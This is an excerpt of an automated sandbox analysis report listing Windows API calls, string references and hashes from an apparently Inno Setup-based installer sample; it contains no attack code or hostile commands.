                                                          • CreateDirectoryA.KERNEL32(00000000,00000000,00000000,0047C4CE,?,?,00000000,0049B628,00000000,00000000,?,00497A45,00000000,00497BEE,?,00000000), ref: 0047C40B
                                                          • GetLastError.KERNEL32(00000000,00000000,00000000,0047C4CE,?,?,00000000,0049B628,00000000,00000000,?,00497A45,00000000,00497BEE,?,00000000), ref: 0047C414
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: CreateDirectoryErrorLast
                                                          • String ID: Created temporary directory: $\_setup64.tmp$_isetup
                                                          • API String ID: 1375471231-2952887711
                                                          • Opcode ID: 3853c7abe1a0bd338ee766f5a09477788eee4f2c95defc4397553f6378db80d7
                                                          • Instruction ID: d537758c7117fefc82ee858029cb7c27e5ed8caa62090c64dc1ceeedb24f0412
                                                          • Opcode Fuzzy Hash: 3853c7abe1a0bd338ee766f5a09477788eee4f2c95defc4397553f6378db80d7
                                                          • Instruction Fuzzy Hash: A0411774A001099BCB01EFA5C892ADEB7B5EF44305F50857BE814B7392DB38AE058B6D
                                                          APIs
                                                          • EnumWindows.USER32(00423A14), ref: 00423AA0
                                                          • GetWindow.USER32(?,00000003), ref: 00423AB5
                                                          • GetWindowLongA.USER32(?,000000EC), ref: 00423AC4
                                                          • SetWindowPos.USER32(00000000,TAB,00000000,00000000,00000000,00000000,00000013,?,000000EC,?,?,?,004241A3,?,?,00423D6B), ref: 00423AFA
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: Window$EnumLongWindows
                                                          • String ID: TAB
                                                          • API String ID: 4191631535-3846439302
                                                          • Opcode ID: 19508b105e07bab33860b27abf9b752e23d544e284505d5f1a6339f97510727e
                                                          • Instruction ID: 44c8a23491b9c45dd34cf4bcc3c04de93252e86aee0086cff54aee2134896fd7
                                                          • Opcode Fuzzy Hash: 19508b105e07bab33860b27abf9b752e23d544e284505d5f1a6339f97510727e
                                                          • Instruction Fuzzy Hash: 7B112A70704610ABDB10DF28D985F5677E8EB08725F51026AF994EB2E3C378AD41CB59
                                                          APIs
                                                          • RegDeleteKeyA.ADVAPI32(00000000,00000000), ref: 0042DE48
                                                          • GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,?,00000000,0042DFE3,00000000,0042DFFB,?,?,?,?,00000006,?,00000000,00496D69), ref: 0042DE63
                                                          • GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 0042DE69
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: AddressDeleteHandleModuleProc
                                                          • String ID: RegDeleteKeyExA$advapi32.dll
                                                          • API String ID: 588496660-1846899949
                                                          • Opcode ID: c05e7c3326c5169c07e68be8c9fbbd77449d19c2dd42617386e66743e2d73e3c
                                                          • Instruction ID: 9c024767392e34e1239b6ccdb0e78e824d69575b4a8d701ce7db5acd733af5c1
                                                          • Opcode Fuzzy Hash: c05e7c3326c5169c07e68be8c9fbbd77449d19c2dd42617386e66743e2d73e3c
                                                          • Instruction Fuzzy Hash: B2E06DF1B41B30AAD72426697C8AFA72728DB74365F618537B105AD1A183FC1C50CE9D
                                                          Strings
                                                          • NextButtonClick, xrefs: 0046BA6C
                                                          • PrepareToInstall failed: %s, xrefs: 0046BC8E
                                                          • Need to restart Windows? %s, xrefs: 0046BCB5
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Need to restart Windows? %s$NextButtonClick$PrepareToInstall failed: %s
                                                          • API String ID: 0-2329492092
                                                          • Opcode ID: c85eed945518d546ff95eb83013acbbea6e3c59c24d52283f76f7584732158fe
                                                          • Instruction ID: ef605359146084d2a330ce9392c81193c54d44d6395a219c566c339d74a55226
                                                          • Opcode Fuzzy Hash: c85eed945518d546ff95eb83013acbbea6e3c59c24d52283f76f7584732158fe
                                                          • Instruction Fuzzy Hash: F6D12A34A04108DFCB10EF99D585AEE77F5EF49304F6444BAE400AB352D778AE81CB9A
                                                          APIs
                                                          • SetActiveWindow.USER32(?,?,00000000,00482990), ref: 0048276C
                                                          • SHChangeNotify.SHELL32(08000000,00000000,00000000,00000000), ref: 00482801
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: ActiveChangeNotifyWindow
                                                          • String ID: $Need to restart Windows? %s
                                                          • API String ID: 1160245247-4200181552
                                                          • Opcode ID: 205c42aac985357c00af048fdaf18b998a02a4faeff7a2d0de879de7ff73840d
                                                          • Instruction ID: d92f6dc0c394a11860c555715cc1377d1ab7d31dc5c27e132739ea4afdffe6c1
                                                          • Opcode Fuzzy Hash: 205c42aac985357c00af048fdaf18b998a02a4faeff7a2d0de879de7ff73840d
                                                          • Instruction Fuzzy Hash: 5291A274A042049FDB10FB69D986BAD77F4AF55308F1084BBE8009B362D7B86D05CB5D
                                                          APIs
                                                            • Part of subcall function 0042C7FC: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C820
                                                          • GetLastError.KERNEL32(00000000,0046FAF9,?,?,0049C1D0,00000000), ref: 0046F9D6
                                                          • SHChangeNotify.SHELL32(00000008,00000001,00000000,00000000), ref: 0046FA50
                                                          • SHChangeNotify.SHELL32(00001000,00001001,00000000,00000000), ref: 0046FA75
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: ChangeNotify$ErrorFullLastNamePath
                                                          • String ID: Creating directory: %s
                                                          • API String ID: 2451617938-483064649
                                                          • Opcode ID: d149bf9a4864bf308676d1666e2ddee2b554becc532c3436bbb106b5e5686cba
                                                          • Instruction ID: 2bd83b05653ced0f0f619092410e1b81403e7cd9e02354fb4b3544f6b0b1216d
                                                          • Opcode Fuzzy Hash: d149bf9a4864bf308676d1666e2ddee2b554becc532c3436bbb106b5e5686cba
                                                          • Instruction Fuzzy Hash: 0F512174E00248ABDB01DFE9D582BDEBBF5AF48304F50847AE844B7396D7785E088B59
                                                          APIs
                                                          • GetProcAddress.KERNEL32(00000000,SfcIsFileProtected), ref: 00454E56
                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000FFF,00000000,00454F1C), ref: 00454EC0
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: AddressByteCharMultiProcWide
                                                          • String ID: SfcIsFileProtected$sfc.dll
                                                          • API String ID: 2508298434-591603554
                                                          • Opcode ID: e7edbd208805aa306e5bb6f456733d4c36fbf9170141b95da0f44c83ccf47135
                                                          • Instruction ID: 176d29f9623cbc30a6d26dfc77e51d4098360506d5c3757ea1f9e8bf8263b863
                                                          • Opcode Fuzzy Hash: e7edbd208805aa306e5bb6f456733d4c36fbf9170141b95da0f44c83ccf47135
                                                          • Instruction Fuzzy Hash: 21416670A04218ABE720EB55DC86B9E77B8EB44309F5041B7E908A7293D7785F89CF5C
                                                          APIs
                                                          • GetClassInfoA.USER32(00400000,?,?), ref: 00416477
                                                          • UnregisterClassA.USER32(?,00400000), ref: 004164A3
                                                          • RegisterClassA.USER32(?), ref: 004164C6
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: Class$InfoRegisterUnregister
                                                          • String ID: @
                                                          • API String ID: 3749476976-2766056989
                                                          • Opcode ID: 58713160258ce5f561964bbdae6a2794c8f6f6caf00f6f1604bd66b56dd4b990
                                                          • Instruction ID: 9d11af1acff112dbe95f15f3a9399eab9f365f4a7252c57533c35fba51c14aa0
                                                          • Opcode Fuzzy Hash: 58713160258ce5f561964bbdae6a2794c8f6f6caf00f6f1604bd66b56dd4b990
                                                          • Instruction Fuzzy Hash: 81316F702043409BD720EF68C981B9B77E5AB89308F04457FF949DB392DB39D944CB6A
                                                          APIs
                                                          • SHAutoComplete.SHLWAPI(00000000,00000001), ref: 0042EDBD
                                                            • Part of subcall function 0042D8BC: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8CF
                                                            • Part of subcall function 0042E38C: SetErrorMode.KERNEL32(00008000), ref: 0042E396
                                                            • Part of subcall function 0042E38C: LoadLibraryA.KERNEL32(00000000,00000000,0042E3E0,?,00000000,0042E3FE,?,00008000), ref: 0042E3C5
                                                          • GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0042EDA0
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: AddressAutoCompleteDirectoryErrorLibraryLoadModeProcSystem
                                                          • String ID: SHAutoComplete$shlwapi.dll
                                                          • API String ID: 395431579-1506664499
                                                          • Opcode ID: 07c44bdcd03860b1f33b3045299bb1d0449c98b3a7b2341f9148d4efe18bbe9e
                                                          • Instruction ID: abd39ea96fbc8e8598eec473428a27bf92d63543bd8a2491ee7d7de58c90140d
                                                          • Opcode Fuzzy Hash: 07c44bdcd03860b1f33b3045299bb1d0449c98b3a7b2341f9148d4efe18bbe9e
                                                          • Instruction Fuzzy Hash: B1117330B00319BFD711EB62ED85B8E7BA8EB55704F90407BF400A6691D778AE05865D
                                                          APIs
                                                            • Part of subcall function 0042DE14: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,0048319F,?,00000001,?,?,0048319F,?,00000001,00000000), ref: 0042DE30
                                                          • RegCloseKey.ADVAPI32(?,00455A4F,?,00000001,00000000), ref: 00455A42
                                                          Strings
                                                          • PendingFileRenameOperations, xrefs: 00455A14
                                                          • PendingFileRenameOperations2, xrefs: 00455A23
                                                          • SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 004559F0
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: CloseOpen
                                                          • String ID: PendingFileRenameOperations$PendingFileRenameOperations2$SYSTEM\CurrentControlSet\Control\Session Manager
                                                          • API String ID: 47109696-2115312317
                                                          • Opcode ID: bdd8c77769c6bad55690eeddcdbd75d9d8896b7276d3d2e2d12af9b25540c28f
                                                          • Instruction ID: 0e3b4bd859061d9736a48b3f0c398de546ea7d73752f370084b2b16911b021d7
                                                          • Opcode Fuzzy Hash: bdd8c77769c6bad55690eeddcdbd75d9d8896b7276d3d2e2d12af9b25540c28f
                                                          • Instruction Fuzzy Hash: 31F09671744A08EFDB04D6A6DC62E7A739DD744711FA04477F800D7682DA7DAD04962C
                                                          APIs
                                                          • FindNextFileA.KERNEL32(000000FF,?,?,?,?,00000000,0047F539,?,00000000,00000000,?,?,00480749,?,?,00000000), ref: 0047F3E6
                                                          • FindClose.KERNEL32(000000FF,000000FF,?,?,?,?,00000000,0047F539,?,00000000,00000000,?,?,00480749,?,?), ref: 0047F3F3
                                                          • FindNextFileA.KERNEL32(000000FF,?,00000000,0047F50C,?,?,?,?,00000000,0047F539,?,00000000,00000000,?,?,00480749), ref: 0047F4E8
                                                          • FindClose.KERNEL32(000000FF,0047F513,0047F50C,?,?,?,?,00000000,0047F539,?,00000000,00000000,?,?,00480749,?), ref: 0047F506
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: Find$CloseFileNext
                                                          • String ID:
                                                          • API String ID: 2066263336-0
                                                          • Opcode ID: b461a46803c2cc4ea78060a2329edfdb5f867b3d72b18562307b1542635c1f41
                                                          • Instruction ID: 93840f20d66fcb2e286325320114c4d74e835c6895e54ad5a4f30f132b089a3b
                                                          • Opcode Fuzzy Hash: b461a46803c2cc4ea78060a2329edfdb5f867b3d72b18562307b1542635c1f41
                                                          • Instruction Fuzzy Hash: 19512F71A00658AFCB21DF65CC45ADEB7B8EB48319F5084BAA818E7341D7389F49CF54
                                                          APIs
                                                          • GetMenu.USER32(00000000), ref: 00421359
                                                          • SetMenu.USER32(00000000,00000000), ref: 00421376
                                                          • SetMenu.USER32(00000000,00000000), ref: 004213AB
                                                          • SetMenu.USER32(00000000,00000000), ref: 004213C7
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: Menu
                                                          • String ID:
                                                          • API String ID: 3711407533-0
                                                          • Opcode ID: 2199c62fdc40b6f857ca540156f476da1cd3d0498d35d1cb2f117de972eee6cd
                                                          • Instruction ID: 7bb7859a2cdb5f88754e70ccfd218d349751ef7fdbf43141b5448ef52fdf7b61
                                                          • Opcode Fuzzy Hash: 2199c62fdc40b6f857ca540156f476da1cd3d0498d35d1cb2f117de972eee6cd
                                                          • Instruction Fuzzy Hash: 0141B03070025456EB20EB3AA8857AB36D64F61308F4856BFBC44DF7A3CA7CCC5583A9
                                                          APIs
                                                          • SendMessageA.USER32(?,?,?,?), ref: 00416B7C
                                                          • SetTextColor.GDI32(?,00000000), ref: 00416B96
                                                          • SetBkColor.GDI32(?,00000000), ref: 00416BB0
                                                          • CallWindowProcA.USER32(?,?,?,?,?), ref: 00416BD8
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: Color$CallMessageProcSendTextWindow
                                                          • String ID:
                                                          • API String ID: 601730667-0
                                                          • Opcode ID: c8424e95f6d781db4325e6c83d9f419e4623fd2ec4a9fd1ab852655791a28026
                                                          • Instruction ID: 029c09512e86dc7a5584eefc6ebe6d25086567911d505253220d4c4c80a1b89b
                                                          • Opcode Fuzzy Hash: c8424e95f6d781db4325e6c83d9f419e4623fd2ec4a9fd1ab852655791a28026
                                                          • Instruction Fuzzy Hash: D4114FB5304604AFD720EE6ECDC4E9777DCAF49310715882AB55ADB602C638F8418B39
                                                          APIs
                                                          • WaitForInputIdle.USER32(?,00000032), ref: 00454F7C
                                                          • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00454F9E
                                                          • GetExitCodeProcess.KERNEL32(?,?), ref: 00454FAD
                                                          • CloseHandle.KERNEL32(?,00454FDA,00454FD3,?,?,?,00000000,?,?,004551AF,?,?,?,00000044,00000000,00000000), ref: 00454FCD
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: Wait$CloseCodeExitHandleIdleInputMultipleObjectsProcess
                                                          • String ID:
                                                          • API String ID: 4071923889-0
                                                          • Opcode ID: 51238a3311eee55e88becd6a870e4e93586b22fb22ba4d0d147ea6b118d6571c
                                                          • Instruction ID: ae4672943cd7382c52be368afd98a0e744302f00d430d4f9e0a97d6bd95691cc
                                                          • Opcode Fuzzy Hash: 51238a3311eee55e88becd6a870e4e93586b22fb22ba4d0d147ea6b118d6571c
                                                          • Instruction Fuzzy Hash: 9C01F931A006087EEB10979D8C02F5B7BACDB89764F610127F904DB2C2C5789D408A68
                                                          APIs
                                                          • 73A1A570.USER32(00000000,?,?,00000000,?,00418FCB,00000000,?,?,?,00000001), ref: 00423116
                                                          • EnumFontsA.GDI32(00000000,00000000,00423060,00410648,00000000,?,?,00000000,?,00418FCB,00000000,?,?,?,00000001), ref: 00423129
                                                          • 73A24620.GDI32(00000000,0000005A,00000000,00000000,00423060,00410648,00000000,?,?,00000000,?,00418FCB,00000000), ref: 00423131
                                                          • 73A1A480.USER32(00000000,00000000,00000000,0000005A,00000000,00000000,00423060,00410648,00000000,?,?,00000000,?,00418FCB,00000000), ref: 0042313C
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: A24620A480A570EnumFonts
                                                          • String ID:
                                                          • API String ID: 2630238358-0
                                                          • Opcode ID: 9afbfd5fafda1dbd28af8ddef14be35d640b69e4e8358016454380424bd4bee6
                                                          • Instruction ID: 69cee35535e214b40259e1ab78654d31e06b117eb7ed13cd681158bdd9fae355
                                                          • Opcode Fuzzy Hash: 9afbfd5fafda1dbd28af8ddef14be35d640b69e4e8358016454380424bd4bee6
                                                          • Instruction Fuzzy Hash: 2F01D2717442102AE700BF795CC6B9B36A4DF04318F40027BF808AB3C6D6BE9C0547AE
                                                          APIs
                                                            • Part of subcall function 00450900: SetEndOfFile.KERNEL32(?,?,0045C162,00000000,0045C2ED,?,00000000,00000002,00000002), ref: 00450907
                                                          • FlushFileBuffers.KERNEL32(?), ref: 0045C2B9
                                                          Strings
                                                          • NumRecs range exceeded, xrefs: 0045C1B6
                                                          • EndOffset range exceeded, xrefs: 0045C1ED
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: File$BuffersFlush
                                                          • String ID: EndOffset range exceeded$NumRecs range exceeded
                                                          • API String ID: 3593489403-659731555
                                                          • Opcode ID: 0bf64ccb4770f6e98af3bdf021747f42c693f3348cd9375c8cc8fc116bf0a776
                                                          • Instruction ID: f1827e02de76a306a1886b93aefbbb2344be70999cb9be9d3c0cbcfad0efad24
                                                          • Opcode Fuzzy Hash: 0bf64ccb4770f6e98af3bdf021747f42c693f3348cd9375c8cc8fc116bf0a776
                                                          • Instruction Fuzzy Hash: 35616334A002548FDB25DF25C891ADAB7B5AF49305F0084DAED88AB353D7749EC9CF54
                                                          APIs
                                                            • Part of subcall function 00403344: GetModuleHandleA.KERNEL32(00000000,004980C2), ref: 0040334B
                                                            • Part of subcall function 00403344: GetCommandLineA.KERNEL32(00000000,004980C2), ref: 00403356
                                                            • Part of subcall function 0040631C: GetModuleHandleA.KERNEL32(kernel32.dll,?,004980CC), ref: 00406322
                                                            • Part of subcall function 0040631C: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0040632F
